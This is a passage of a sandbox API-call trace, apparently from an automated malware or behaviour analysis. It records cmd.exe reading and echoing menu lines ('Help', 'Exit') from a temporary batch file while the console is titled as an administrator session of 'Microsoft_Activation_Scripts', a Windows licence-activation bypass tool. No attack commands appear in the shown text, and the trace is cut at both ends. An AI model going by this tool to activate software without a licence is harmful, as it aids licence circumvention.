(_FileHandle=3) returned 0xa0 [0181.012] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2675 [0181.012] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0181.012] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9873, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2691 [0181.012] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [8] Help\r\n", cbMultiByte=28, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: [8] Help\r\n\r\nhoot\r\ntus\r\n___________________________ \r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 28 [0181.012] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.012] GetFileType (hFile=0xa0) returned 0x1 [0181.012] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.012] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2691 [0181.012] GetProcessHeap () returned 0x19a8f1e0000 [0181.012] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.012] GetProcessHeap () returned 0x19a8f1e0000 [0181.013] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.014] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0181.014] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0181.014] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0181.014] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0181.014] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0181.014] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0181.014] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0181.014] GetProcessHeap () returned 0x19a8f1e0000 [0181.014] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0181.014] GetProcessHeap () returned 0x19a8f1e0000 [0181.014] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0181.014] GetProcessHeap () returned 0x19a8f1e0000 [0181.014] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3c) returned 0x19a8f1f91d0 [0181.014] _tell (_FileHandle=3) returned 9873 [0181.014] _close (_FileHandle=3) returned 0 [0181.014] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0181.014] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0181.014] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0181.015] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0181.015] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0181.015] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0181.015] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0181.015] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0181.015] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0181.015] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0181.015] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0181.015] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0181.015] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0181.015] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0181.015] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0181.015] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0181.015] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0181.015] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0181.015] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0181.015] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0181.015] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0181.015] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0181.015] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0181.015] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0181.015] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0181.015] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0181.015] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0181.015] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0181.015] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0181.016] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0181.016] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0181.016] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0181.016] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0181.016] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0181.016] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0181.016] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0181.016] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0181.016] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0181.016] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0181.016] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0181.016] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0181.016] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0181.016] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0181.016] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0181.016] GetLastError () returned 0x7b [0181.016] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.017] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0181.017] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0181.017] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0181.017] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0181.017] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0181.017] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0181.017] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0181.017] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0181.017] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0181.017] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0181.017] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0181.017] GetProcessHeap () returned 0x19a8f1e0000 [0181.017] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x46) returned 0x19a8f1f95e0 [0181.018] GetProcessHeap () returned 0x19a8f1e0000 [0181.018] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x6c) returned 0x19a8f1ef9a0 [0181.018] GetProcessHeap () returned 0x19a8f1e0000 [0181.018] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ef9a0, Size=0x28) returned 0x19a8f1eb6e0 [0181.018] GetProcessHeap () returned 0x19a8f1e0000 [0181.018] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6e0) returned 0x28 [0181.018] GetProcessHeap () returned 0x19a8f1e0000 [0181.018] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f9270 [0181.018] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" [8] Help\r\n") returned 23 [0181.018] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.018] GetFileType (hFile=0x24) returned 0x2 [0181.018] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0181.018] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0181.020] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.020] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x17) returned 1 [0181.022] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.022] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0181.022] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.022] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0181.023] _get_osfhandle (_FileHandle=0) returned 0x20 [0181.023] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0181.023] SetConsoleInputExeNameW () returned 0x1 [0181.023] GetConsoleOutputCP () returned 0x1b5 [0181.024] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0181.024] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.024] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0181.024] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0181.024] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.024] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9873, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2691 [0181.024] GetProcessHeap () returned 0x19a8f1e0000 [0181.025] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9270) returned 1 [0181.025] GetProcessHeap () returned 0x19a8f1e0000 [0181.025] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0181.025] GetProcessHeap () returned 0x19a8f1e0000 [0181.026] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f95e0) returned 1 [0181.026] GetProcessHeap () returned 0x19a8f1e0000 [0181.026] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f91d0) returned 1 [0181.026] GetProcessHeap () returned 0x19a8f1e0000 [0181.026] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0181.026] GetProcessHeap () returned 0x19a8f1e0000 [0181.027] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0181.027] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.027] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2691 [0181.027] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0181.027] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9901, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x26ad [0181.027] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [0] Exit\r\n", cbMultiByte=28, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: [0] Exit\r\n\r\nhoot\r\ntus\r\n___________________________ \r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 28 [0181.027] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.027] GetFileType (hFile=0xa0) returned 0x1 [0181.027] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.027] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x26ad [0181.027] GetProcessHeap () returned 0x19a8f1e0000 [0181.027] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.028] GetProcessHeap () returned 0x19a8f1e0000 [0181.028] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.028] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0181.028] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0181.028] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0181.028] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0181.028] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0181.028] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0181.028] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0181.028] GetProcessHeap () returned 0x19a8f1e0000 [0181.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0181.028] GetProcessHeap () returned 0x19a8f1e0000 [0181.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0181.029] GetProcessHeap () returned 0x19a8f1e0000 [0181.029] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3c) returned 0x19a8f1f9590 [0181.029] _tell (_FileHandle=3) returned 9901 [0181.029] _close (_FileHandle=3) returned 0 [0181.029] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0181.029] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0181.029] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0181.029] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0181.029] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0181.029] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0181.029] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0181.029] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0181.029] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0181.029] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0181.029] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0181.029] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0181.029] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0181.029] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0181.029] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0181.029] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0181.030] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0181.030] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0181.030] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0181.030] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0181.030] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0181.030] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0181.030] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0181.030] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0181.030] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0181.030] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0181.030] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0181.030] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0181.030] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0181.030] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0181.030] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0181.030] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0181.030] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0181.030] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0181.030] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0181.030] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0181.030] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0181.030] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0181.030] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0181.030] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0181.030] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0181.030] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0181.031] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0181.031] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0181.031] GetLastError () returned 0x7b [0181.031] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.032] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0181.032] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0181.032] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0181.032] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0181.032] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0181.032] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0181.032] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0181.032] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0181.032] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0181.032] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0181.032] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0181.032] GetProcessHeap () returned 0x19a8f1e0000 [0181.032] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x46) returned 0x19a8f1f9310 [0181.032] GetProcessHeap () returned 0x19a8f1e0000 [0181.032] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x6c) returned 0x19a8f1eeda0 [0181.032] GetProcessHeap () returned 0x19a8f1e0000 [0181.032] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eeda0, Size=0x28) returned 0x19a8f1eb710 [0181.032] GetProcessHeap () returned 0x19a8f1e0000 [0181.032] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb710) returned 0x28 [0181.032] GetProcessHeap () returned 0x19a8f1e0000 [0181.032] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f95e0 [0181.032] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" [0] Exit\r\n") returned 23 [0181.033] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.033] GetFileType (hFile=0x24) returned 0x2 [0181.033] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0181.033] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0181.033] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.033] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x17) returned 1 [0181.037] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.037] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0181.041] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.041] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0181.041] _get_osfhandle (_FileHandle=0) returned 0x20 [0181.041] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0181.042] SetConsoleInputExeNameW () returned 0x1 [0181.042] GetConsoleOutputCP () returned 0x1b5 [0181.043] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0181.043] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.043] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0181.044] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0181.044] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.044] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9901, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x26ad [0181.044] GetProcessHeap () returned 0x19a8f1e0000 [0181.044] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f95e0) returned 1 [0181.044] GetProcessHeap () returned 0x19a8f1e0000 [0181.045] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0181.045] GetProcessHeap () returned 0x19a8f1e0000 [0181.045] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9310) returned 1 [0181.045] GetProcessHeap () returned 0x19a8f1e0000 [0181.045] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9590) returned 1 [0181.045] GetProcessHeap () returned 0x19a8f1e0000 [0181.046] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0181.046] GetProcessHeap () returned 0x19a8f1e0000 [0181.046] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0181.046] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.046] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x26ad [0181.046] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0181.046] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9977, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x26f9 [0181.046] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ______________________________________________________________\r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: ______________________________________________________________\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 76 [0181.047] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.047] GetFileType (hFile=0xa0) returned 0x1 [0181.047] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.047] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x26f9 [0181.047] GetProcessHeap () returned 0x19a8f1e0000 [0181.047] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.047] GetProcessHeap () returned 0x19a8f1e0000 [0181.047] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.047] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0181.047] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0181.047] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0181.047] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0181.048] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0181.048] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0181.048] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0181.048] GetProcessHeap () returned 0x19a8f1e0000 [0181.048] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0181.048] GetProcessHeap () returned 0x19a8f1e0000 [0181.048] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb920 [0181.048] GetProcessHeap () returned 0x19a8f1e0000 [0181.048] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9c) returned 0x19a8f2003a0 [0181.048] _tell (_FileHandle=3) returned 9977 [0181.048] _close (_FileHandle=3) returned 0 [0181.048] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0181.048] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0181.048] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0181.048] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0181.048] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0181.048] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0181.048] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0181.048] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0181.048] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0181.049] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0181.049] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0181.049] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0181.049] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0181.049] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0181.049] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0181.049] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0181.049] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0181.049] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0181.049] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0181.049] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0181.049] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0181.049] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0181.049] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0181.049] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0181.049] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0181.049] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0181.049] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0181.049] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0181.049] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0181.049] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0181.049] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0181.049] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0181.052] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0181.052] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0181.052] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0181.052] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0181.052] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0181.052] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0181.052] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0181.052] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0181.052] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0181.052] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0181.053] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0181.053] GetFileAttributesW (lpFileName="\n" (normalized: 